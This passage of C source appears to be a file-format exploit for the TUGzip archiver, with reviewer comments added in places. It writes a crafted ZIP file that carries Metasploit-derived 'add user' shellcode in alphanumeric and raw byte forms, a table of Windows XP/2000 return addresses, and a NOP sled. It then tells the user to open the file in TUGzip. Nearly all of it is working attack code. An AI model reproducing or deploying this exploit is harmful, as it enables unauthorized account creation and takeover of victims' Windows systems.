"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"  
"\x32\x32\x32\x32\x2E\x74\x78\x74\x50\x4B\x05\x06\x00\x00\x00\x00"  
"\x01\x00\x01\x00\x42\x08\x00\x00\x32\x08\x00\x00";  
  
  
/*
 * Payload option [1] in main(): the alphanumeric-encoded form. It is only
 * ever passed to memcpy, never to printf, so the "%s" sequences inside the
 * literal are plain bytes rather than format directives. sizeof(shellcode_1)
 * counts the terminating NUL, which is copied into the buffer too.
 */
char shellcode_1[]=  
// Skylined's alpha2 unicode decoder  
//Un-encoded ADD USER shellcode  
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA"  
"BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"  
// Encoded opcodes  
"ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM"  
"kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp"  
"tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"  
"C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s"  
"mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s"  
"MPNOOQa4oTkPA";  
//ADD USER shellcode TNX to metasploit   
/*
 * Payload option [2] in main(): the raw (non-alphanumeric) byte form of the
 * same payload. Copied with memcpy to shellcode_offset; sizeof(shellcode_2)
 * counts the trailing NUL, so one extra zero byte lands after it.
 */
char shellcode_2[]=  
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"  
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"  
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"  
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"  
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"  
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"  
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"  
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"  
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"  
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"  
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"  
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"  
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"  
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"  
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"  
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"  
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"  
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"  
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"  
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"  
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"  
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";  
  
/*
 * Platform table. main() indexes it with atoi(argv[2]) (no range check) and
 * writes the selected addr, via memcpy of its first 4 bytes in host byte
 * order, at OFFSET in the output buffer. The usage listing in main() walks the
 * table until it reaches the entry whose platform is NULL. The
 * "Crash the program" entry, 0x58585858 ("XXXX"), is the EIP value shown in
 * the register dump in the file header.
 */
struct addresses  
{ char *platform;   /* label printed in the usage listing */
unsigned long addr;   /* value patched into the file at OFFSET */
}   
targets[]=  
{   
  
{ "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf },  
{ "[*]Microsoft Windows Pro sp3 English (call esp)",0x7C8369F0 },  
{ "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B },  
{ "[*]Windows XP 5.1.2.0 SP2 (IA32) English (jmp esp)",0x7d184de7 },  
{ "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197 },  
{ "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208 },  
{ "[*]Crash the program",0x58585858 },  
{NULL }   /* sentinel: platform == NULL ends the listing loop */
};   
  
/*
 * Entry point. Builds the archive image in a heap buffer and writes it to
 * argv[1].
 *   argv[1] - output file name, opened with "wb"
 *   argv[2] - index into targets[], selects the address written at OFFSET
 * Returns 0 on every path; an fopen failure calls exit(0), so the process
 * exit status never signals an error.
 *
 * NOTE(review): targets[atoi(argv[2])] is evaluated before argc is checked,
 * so running with fewer than three arguments reads past the end of argv
 * (argv[argc] is NULL; atoi(NULL) is undefined behaviour). The argc<2 test
 * that follows does not guard argv[2] either, and atoi's result is never
 * compared against the size of targets[].
 */
int main(int argc,char *argv[])  
{ FILE *h;  
char *buffer;  
/* allocation result is not checked; buffer may be NULL at the memcpy calls below */
buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2));  
unsigned int offset=0;  
int number;   /* only assigned by scanf below; indeterminate if scanf fails */
unsigned int retaddress=targets[atoi(argv[2])].addr;   
if(argc<2)   
{ printf("# \tChose your Platform #\n");   
for(int i=0;targets[i].platform;i++)  
printf("%d \t\t %s\n",i,targets[i].platform);  
printf("\tUsage is:\n");  
/* non-literal format string (CERT FIO30-C): any '%' in the program's own path
 * is interpreted as a conversion; printf("%s",argv[0]) would be the safe form */
printf(argv[0]);  
printf(".exe ");  
printf("filename.zip ");  
printf("platform\n");   
printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");   
  
system("color 02");   /* spawns a shell just to recolour the console (cosmetic) */
Sleep(2000);   /* Win32 Sleep from windows.h, milliseconds */
return 0;   
}  
  
if((h=fopen(argv[1],"wb"))==NULL)  
{ printf("error\n");   
exit(0);   /* exits with status 0 even though the open failed; buffer is leaked */
}  
  
/* Layout: file_1 (with its NUL) at 0, then file_2 starting one byte earlier so
 * that file_2's first byte replaces file_1's terminating NUL. The last byte of
 * the buffer, index sizeof(file_1)+sizeof(file_2)-1, is never written by
 * either memcpy and so holds whatever malloc returned. */
memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1);   
memcpy(buffer+offset-1,file_2,sizeof(file_2)); offset=OFFSET;  
/* 4 bytes of the chosen targets[].addr at OFFSET; the "offset=0;" is dead,
 * it is overwritten by offset=NOP in the same statement line */
memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP;  
memset(buffer+offset,0x90,20);   /* 20 bytes of 0x90 at NOP */
  
printf("#___________________________________________________________________________#\n");  
printf("Now chose your shellcode \n");  
printf("Press [1] for Alphanumeric shellcode\n");  
printf("Press [2] for NonAphanumeric shellcode\n");  
printf("#___________________________________________________________________________#\n");  
  
scanf("%d",&number);   /* return value unchecked; on bad input number stays uninitialised */
/* No break after case 1 and no default: case 1 falls through into case 2, so
 * both memcpy calls run at the same offset and shellcode_2 overwrites the
 * first sizeof(shellcode_2) bytes of shellcode_1. Each sizeof includes the
 * array's terminating NUL. Any value other than 1 or 2 copies nothing. */
switch(number)  
{ case 1:  
offset=shellcode_offset;  
memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1));   
case 2:  
offset=shellcode_offset;  
memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2));   
}   
/* writes the whole buffer, including the uninitialised final byte noted above;
 * short writes are not detected */
fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h);   
printf("Building file ...\n");  
printf("Done ! Open with TUGzip and see what happens :) \n");  
printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");   
fclose(h);   /* return value unchecked, so a failed flush goes unnoticed */
free(buffer);  
return 0;   
}  
  
`